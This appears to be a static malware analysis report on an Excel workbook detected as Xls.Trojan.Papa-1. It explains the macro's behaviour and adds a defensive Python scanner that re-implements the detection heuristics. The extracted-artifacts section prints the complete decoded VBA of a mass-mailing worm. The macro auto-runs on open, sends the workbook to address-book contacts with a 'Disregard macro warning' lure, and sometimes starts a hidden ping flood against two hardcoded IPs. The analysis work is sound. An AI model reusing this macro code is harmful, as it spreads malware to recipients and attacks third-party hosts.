Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa0aed48b7309062…

MALICIOUS

Office (OLE)

Size: 16.5 KB
Created: 1999-03-29 04:34:30
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 8c8947536b4f77fec8c8378ee007bda1
SHA-1: ce9406ab0754ee37b126db8c13c7d375900f81df
SHA-256: fa0aed48b730906276ba4753aba27d93b973fa30697fc0c98d980e93627e9c69
Risk score: 320

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1041 Exfiltration Over C2 Channel
  • T1566.001 Phishing: Spearphishing Attachment
  • T1071.001 Application Layer Protocol: Web Protocols

The sample carries a Workbook_Open macro in the ThisWorkbook module, so it runs as soon as the file is opened with macros enabled. The macro first sets On Error Resume Next and Application.EnableCancelKey = 0 (xlDisabled), which swallows every failure and stops the user from interrupting it with Ctrl+Break. It then creates an Outlook.Application object via CreateObject, checks that the object evaluates to "Outlook" (a comparison through the object's default property, which fails if CreateObject returned nothing), logs on to the MAPI namespace with the literal strings "profile" and "password", and walks every address list. For each list it builds one message addressed to at most the first 60 entries (the x > 60 assignment ends the inner loop early), sets the subject "Fwd: Workbook from all.net and Fred Cohen" and the body "Urgent info inside.  Disregard macro warning.", attaches ActiveWorkbook.FullName, and sends it. That is the mass-mailing worm behaviour behind the ClamAV name Xls.Trojan.Papa-1: the workbook itself is the only thing propagated, and the social-engineering text exists to get the recipient to enable macros.

After Logoff the macro draws q = Int(6 * Rnd) (0 to 5) and, for q = 2 or q = 4, calls Shell with vbHide on ping -t -l<N> -w 1 <IP>, where N = Int(60000 * Rnd) and the IP is one of the two hardcoded addresses 207.222.214.225 or 24.1.84.100 (Str() prepends a space to a positive number, so the command line is well-formed). That is a continuous ICMP echo with an oversized payload and a 1 ms reply timeout, hidden from the user and never terminated: a network flood against one of the hardcoded hosts, roughly one time in three. ping cannot download or execute anything, so this branch is not a second-stage downloader, and nothing in the macro speaks HTTP or exfiltrates data; the T1041 and T1071.001 tags above are not supported by the code, whereas T1566.001 and T1059.005 are. The macro's intent is to spread itself by e-mail and to harass the two hardcoded hosts.

Heuristics 6

  • ClamAV: Xls.Trojan.Papa-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Papa-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
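As an added example (not the report engine's code and not part of the original page), the following stdlib-only Python scanner re-implements the source-level heuristics listed above (Workbook_Open, Shell, CreateObject, plus the hardcoded IPs and the Outlook self-mailer pattern from the summary) and the p-code co-occurrence rule for the case where only a pcodedmp-style listing is available. Both inputs are constructed excerpts modelled on this sample; the heuristic IDs are reused from this page, while the token lists, regexes, the `scan_vba_source`/`scan_pcode` names and the extra Sheet1 "Helper" stream in the p-code excerpt are my assumptions.

```python
import re

# Constructed excerpt modelled on the macro shown in this report (not the full artifact).
VBA_SOURCE = '''\
Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
On Error Resume Next
Set oa = CreateObject("Outlook.Application")
Set mn = oa.GetNameSpace("MAPI")
papaver.Attachments.Add ActiveWorkbook.FullName
papaver.Send
q = Int(6 * Rnd)
If q = 2 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 207.222.214.225", vbHide
ElseIf q = 4 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 24.1.84.100", vbHide
End If
End Sub
'''

# Constructed pcodedmp-style listing: tokens only, as when source extraction fails.
# The Sheet1 "Helper" stream is an assumed benign module used as a negative case.
PCODE_LISTING = '''\
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 2885 bytes
' Line #0:
' \tFuncDefn (Private Sub Workbook_Open())
' Line #4:
' \tLitStr 0x0013 "Outlook.Application"
' \tArgsLd CreateObject 0x0001
' Line #27:
' \tLitStr 0x000A "ping -t -l"
' \tLd vbHide
' \tArgsCall Shell 0x0002
' _VBA_PROJECT_CUR/VBA/Sheet1 - 991 bytes
' Line #0:
' \tFuncDefn (Sub Helper())
' \tArgsCall MsgBox 0x0001
'''

# Assumed trigger and execution token lists (Office auto-exec names, VBA execution primitives).
AUTOEXEC = {"workbook_open", "workbook_activate", "auto_open", "autoopen", "autoexec",
            "document_open", "auto_close", "autoclose", "document_close"}
EXEC_TOKENS = {"shell", "createobject", "getobject", "run", "exec", "execute",
               "shellexecute", "urldownloadtofile", "callbyname"}


def scan_vba_source(src):
    """Apply the report's source-level heuristics to decoded VBA; returns {id: evidence}."""
    findings = {}
    procs = re.findall(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*\(",
                       src, re.I | re.M)
    auto = [p for p in procs if p.lower() in AUTOEXEC]
    if auto:
        findings["OLE_VBA_WBOPEN"] = auto
    objs = re.findall(r'\bCreateObject\s*\(\s*"([^"]+)"', src, re.I)
    if objs:
        findings["OLE_VBA_CREATEOBJ"] = objs
    # Shell as a VBA call, not the ".Shell" tail of a ProgID such as WScript.Shell.
    shells = re.findall(r"(?<![.\w])Shell\b[^\r\n]*", src, re.I)
    if shells:
        findings["OLE_VBA_SHELL"] = shells
    ips = sorted(set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", src)))
    if ips:
        findings["hardcoded_ips"] = ips
    # Self-mailer pattern from the summary: Outlook automation, the open workbook attached, Send.
    if (any(o.lower() == "outlook.application" for o in objs)
            and re.search(r"\.Send\b", src)
            and re.search(r"Attachments\.Add\s+ActiveWorkbook\.FullName", src, re.I)):
        findings["outlook_self_mailer"] = True
    return findings


def scan_pcode(listing):
    """Per module stream, collect auto-exec FuncDefns, execution tokens and string literals
    from a pcodedmp-style listing; fire OLE_VBA_PCODE_AUTOEXEC_EXEC on co-occurrence."""
    modules, cur = {}, None
    for line in listing.splitlines():
        body = line.lstrip("'").strip()
        m = re.match(r"\S+/VBA/(\w+)\s+-\s+\d+ bytes$", body)
        if m:
            cur = m.group(1)
            modules[cur] = {"autoexec": [], "exec_tokens": [], "strings": []}
            continue
        if cur is None:
            continue
        m = re.match(r"FuncDefn \((?:Private |Public )?(?:Sub|Function) (\w+)", body)
        if m and m.group(1).lower() in AUTOEXEC:
            modules[cur]["autoexec"].append(m.group(1))
        m = re.match(r"Args(?:Mem)?(?:Call|Ld) (\w+)", body)
        if m and m.group(1).lower() in EXEC_TOKENS:
            modules[cur]["exec_tokens"].append(m.group(1))
        m = re.match(r'LitStr 0x[0-9A-Fa-f]+ "(.*)"$', body)
        if m:
            modules[cur]["strings"].append(m.group(1))
    for info in modules.values():
        info["OLE_VBA_PCODE_AUTOEXEC_EXEC"] = bool(info["autoexec"] and info["exec_tokens"])
    return modules


if __name__ == "__main__":
    for key, value in scan_vba_source(VBA_SOURCE).items():
        print(f"{key}: {value}")
    for mod, info in scan_pcode(PCODE_LISTING).items():
        print(mod, info)
```

The p-code rule deliberately keys on token co-occurrence within one module stream rather than on any string, which is what lets it survive the source-stripping and string-splitting tricks that defeat plain-text signatures; the price is that a benign module with a legitimate Shell call inside Workbook_Open will also fire, so it is scored as a high-confidence indicator rather than a verdict.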

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4469 bytes
SHA-256: e5131945628f13103b106973c21dbcc475e2fc3b2d82da4b3e70f0b4371b10f2
Detection
ClamAV: Xls.Trojan.Papa-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
On Error Resume Next
Application.EnableCancelKey = 0
Randomize
Set oa = CreateObject("Outlook.Application")
Set mn = oa.GetNameSpace("MAPI")
If oa = "Outlook" Then
mn.Logon "profile", "password"
For y = 1 To mn.AddressLists.Count
x = 1
Set ab = mn.AddressLists(y)
Set papaver = oa.CreateItem(0)
For z = 1 To ab.AddressEntries.Count
vi = ab.AddressEntries(x)
papaver.Recipients.Add vi
x = x + 1
If x > 60 Then z = ab.AddressEntries.Count
Next z
papaver.Subject = "Fwd: Workbook from all.net and Fred Cohen"
papaver.Body = "Urgent info inside.  Disregard macro warning."
papaver.Attachments.Add ActiveWorkbook.FullName
papaver.Send
vi = ""
Next y
mn.Logoff
q = Int(6 * Rnd)
If q = 2 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 207.222.214.225", vbHide
ElseIf q = 4 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 24.1.84.100", vbHide
End If
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/2570a02638fb43cba9d15893eeafe231.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 2885 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #3:
' 	ArgsCall Read 0x0000 
' Line #4:
' 	SetStmt 
' 	LitStr 0x0013 "Outlook.Application"
' 	ArgsLd CreateObject 0x0001 
' 	Set oa 
' Line #5:
' 	SetStmt 
' 	LitStr 0x0004 "MAPI"
' 	Ld oa 
' 	ArgsMemLd GetNameSpace 0x0001 
' 	Set mn 
' Line #6:
' 	Ld oa 
' 	LitStr 0x0007 "Outlook"
' 	Eq 
' 	IfBlock 
' Line #7:
' 	LitStr 0x0007 "profile"
' 	LitStr 0x0008 "password"
' 	Ld mn 
' 	ArgsMemCall Logon 0x0002 
' Line #8:
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld mn 
' 	MemLd AddressLists 
' 	MemLd Count 
' 	For 
' Line #9:
' 	LitDI2 0x0001 
' 	St x 
' Line #10:
' 	SetStmt 
' 	Ld y 
' 	Ld mn 
' 	ArgsMemLd AddressLists 0x0001 
' 	Set ab 
' Line #11:
' 	SetStmt 
' 	LitDI2 0x0000 
' 	Ld oa 
' 	ArgsMemLd CreateItem 0x0001 
' 	Set papaver 
' Line #12:
' 	StartForVariable 
' 	Ld z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ab 
' 	MemLd AddressEntries 
' 	MemLd Count 
' 	For 
' Line #13:
' 	Ld x 
' 	Ld ab 
' 	ArgsMemLd AddressEntries 0x0001 
' 	St vi 
' Line #14:
' 	Ld vi 
' 	Ld papaver 
' 	MemLd Recipients 
' 	ArgsMemCall Add 0x0001 
' Line #15:
' 	Ld x 
' 	LitDI2 0x0001 
' 	Add 
' 	St x 
' Line #16:
' 	Ld x 
' 	LitDI2 0x003C 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	Ld ab 
' 	MemLd AddressEntries 
' 	MemLd Count 
' 	St z 
' 	EndIf 
' Line #17:
' 	StartForVariable 
' 	Ld z 
' 	EndForVariable 
' 	NextVar 
' Line #18:
' 	LitStr 0x0029 "Fwd: Workbook from all.net and Fred Cohen"
' 	Ld papaver 
' 	MemSt Subject 
' Line #19:
' 	LitStr 0x002D "Urgent info inside.  Disregard macro warning."
' 	Ld papaver 
' 	MemSt Body 
' Line #20:
' 	Ld ActiveWorkbook 
' 	MemLd FullName 
' 	Ld papaver 
' 	MemLd Attachments 
' 	ArgsMemCall Add 0x0001 
' Line #21:
' 	Ld papaver 
' 	ArgsMemCall Send 0x0000 
' Line #22:
' 	LitStr 0x0000 ""
' 	St vi 
' Line #23:
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	NextVar 
' Line #24:
' 	Ld mn 
' 	ArgsMemCall Logoff 0x0000 
' Line #25:
' 	LitDI2 0x0006 
' 	Ld Rnd 
' 	Mul 
' 	FnInt 
' 	St q 
' Line #26:
' 	Ld q 
' 	LitDI2 0x0002 
' 	Eq 
' 	IfBlock 
' Line #27:
' 	LitStr 0x000A "ping -t -l"
' 	LitDI4 0xEA60 0x0000 
' 	Ld Rnd 
' 	Mul 
' 	FnInt 
' 	ArgsLd Str 0x0001 
' 	Concat 
' 	LitStr 0x0015 " -w 1 207.222.214.225"
' 	Concat 
' 	Ld vbHide 
' 	ArgsCall Shell 0x0002 
... (truncated)